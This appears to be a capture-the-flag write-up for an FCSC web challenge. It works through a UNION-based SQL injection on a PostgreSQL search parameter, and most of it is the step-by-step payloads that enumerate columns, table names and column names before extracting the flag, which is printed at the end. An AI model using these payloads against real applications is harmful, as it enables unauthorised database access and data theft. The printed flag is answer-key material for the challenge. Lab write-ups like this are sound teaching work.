We know from Chatpristi 1/1 that the website is vulnerable to an SQL injection through GET requests to the index with the search keyword. Let’s dig further to learn about the database structure. For this, we will use the PostgreSQL information schema.
Database introspection
From the PostgreSQL documentation, we know that database information is stored in views of a schema called information_schema.
Finding the table names
We will use a SQL UNION with the view information_schema.tables. Here is how we get to the correct payload:
') UNION SELECT 'a' FROM information_schema.tables--gives us “each UNION query must have the same number of columns”.') UNION SELECT 'a', 'b' FROM information_schema.tables--gives us the same message. Let’s keep adding columns until we match the number of columns in the firstSELECTstatement of the query.') UNION SELECT 'a', 'b', 'c' FROM information_schema.tables--gives us “invalid input syntax for type integer: “a””. This means that there are three columns, but the first one is an integer.') UNION SELECT 1, 'b', 'c' FROM information_schema.tables--doesn’t give an error message anymore, and a box with “c” written in it appears on screen. So the last column of the query corresponds to the labels that accompany the images.') UNION SELECT 1, 'b', table_name FROM information_schema.tables--displays all the table names. One is particularly intriguing:___youw1lln3verfindmyfl4g___.
Finding the column names
Lets continue with the same method to learn about the columns that this table contains. We use the following payload: ') UNION SELECT 1, 'b', column_name FROM information_schema.columns WHERE table_name='___youw1lln3verfindmyfl4g___'--. We learn that the column names are: id and fstbg0adwb8f5upmg. Let’s check what’s inside!
The flag
At last, this payload yields the flag: ') UNION SELECT 1, 'b', fstbg0adwb8f5upmg FROM ___youw1lln3verfindmyfl4g___--.
FCSC{edfaeb139255929e55a3cffe9f3f37cd4e871e5015c4d4ade2b02d77d44019e5}